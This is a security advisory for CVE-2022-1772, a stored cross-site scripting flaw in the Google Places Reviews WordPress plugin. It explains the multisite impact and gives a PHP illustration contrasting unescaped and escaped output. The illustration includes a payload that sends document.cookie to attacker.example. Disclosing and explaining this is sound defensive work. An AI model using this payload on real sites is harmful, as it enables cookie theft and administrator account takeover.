PT-2022-14102 · WordPress · Google Places Reviews Wordpress Plugin

Krishna Harsha Kondaveeti

·

Published

2022-06-13

·

Updated

2022-06-21

·

CVE-2022-1772

CVSS v3.1

4.8

Medium

Vector: AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions

Google Places Reviews WordPress plugin, versions prior to 2.0.0

Description

The Google Places Reviews WordPress plugin does not escape its Google API key setting before rendering it back into the plugin's settings page in the WordPress administration panel. A user who can edit that setting can store HTML or JavaScript in it, which then executes in the browser of anyone who opens the page (stored cross-site scripting). On a single site this requires administrator privileges, so it adds little. The impact is in a multisite installation, where an administrator of one site cannot normally post unfiltered HTML: a malicious site administrator can store a payload and wait for a super-administrator to view that site's settings page, which is why the CVSS vector records a changed scope (S:C). Execution in the super-administrator's session can lead to takeover of that account.

Recommendations

For versions prior to 2.0.0, update to version 2.0.0 or later, which fixes the issue. Until the update is applied, limit exposure by reviewing which users hold the administrator role on sub-sites, since only they can change the API key setting, and avoid opening sub-site settings pages from a super-administrator account.
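The mechanism described above, as an added illustration that is not the plugin's own code: a WordPress-style settings field that echoes the stored option straight into an HTML attribute, beside the same field rendered through `esc_attr()`, plus a sanitizer of the kind that would be attached via `register_setting()`. The function and option names (`gpr_*`) are hypothetical; `esc_attr()` and `sanitize_text_field()` are real WordPress core functions, and the stand-ins defined here exist only so the file runs outside WordPress. The attacker input is constructed, and the key-format check in the sanitizer is an assumption about what a valid Google API key looks like.

```php
<?php
// Added illustration (hypothetical names, not the plugin's code): how an
// unescaped settings value becomes stored XSS in a WordPress admin page,
// and how the output should be escaped and the input sanitized instead.

// Minimal stand-ins so this runs outside WordPress. Inside WordPress the
// core functions are used and these definitions are skipped.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
    }
}
if ( ! function_exists( 'sanitize_text_field' ) ) {
    function sanitize_text_field( $text ) {
        return trim( strip_tags( (string) $text ) );
    }
}

// Constructed attacker input: a "key" that closes the value attribute,
// injects a script, and re-opens an attribute so the markup still parses.
// Saved by a site administrator through the plugin's settings form.
$stored_api_key = 'AIza"><script>fetch("https://attacker.example/?c="+document.cookie)</script><input type="hidden" value="';

// VULNERABLE: the stored option is concatenated into the attribute as-is.
// The double quote in the value terminates the attribute and the <script>
// runs for whoever loads the page, including a multisite super-administrator.
function gpr_render_api_key_field_vulnerable( $api_key ) {
    return '<input type="text" name="gpr_api_key" value="' . $api_key . '" />';
}

// FIXED: esc_attr() encodes ", ', <, > and &, so the value cannot leave the
// attribute regardless of what was stored. This is the output-side fix.
function gpr_render_api_key_field_fixed( $api_key ) {
    return '<input type="text" name="gpr_api_key" value="' . esc_attr( $api_key ) . '" />';
}

// Defence in depth on the input side: attach this as the sanitize_callback of
// register_setting() so a malformed key never reaches the database at all.
// The pattern is an assumption about Google API key format (a short run of
// URL-safe characters); anything else is dropped rather than stored.
function gpr_sanitize_api_key( $value ) {
    $value = sanitize_text_field( $value );
    return preg_match( '/^[A-Za-z0-9_-]{20,64}$/', $value ) ? $value : '';
}

echo "vulnerable: ", gpr_render_api_key_field_vulnerable( $stored_api_key ), PHP_EOL;
echo "fixed:      ", gpr_render_api_key_field_fixed( $stored_api_key ), PHP_EOL;
echo "sanitized:  '", gpr_sanitize_api_key( $stored_api_key ), "'", PHP_EOL;
```

Run with `php file.php`. The vulnerable line prints live `<script>` markup inside the form; the fixed line prints the same payload as `&quot;&gt;&lt;script&gt;...`, inert text inside the attribute; the sanitizer returns an empty string for the constructed input, so the payload would never have been stored in the first place.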

Exploit

Fix

XSS


Weakness Enumeration

Related Identifiers

CVE-2022-1772

Affected Products

Google Places Reviews Wordpress Plugin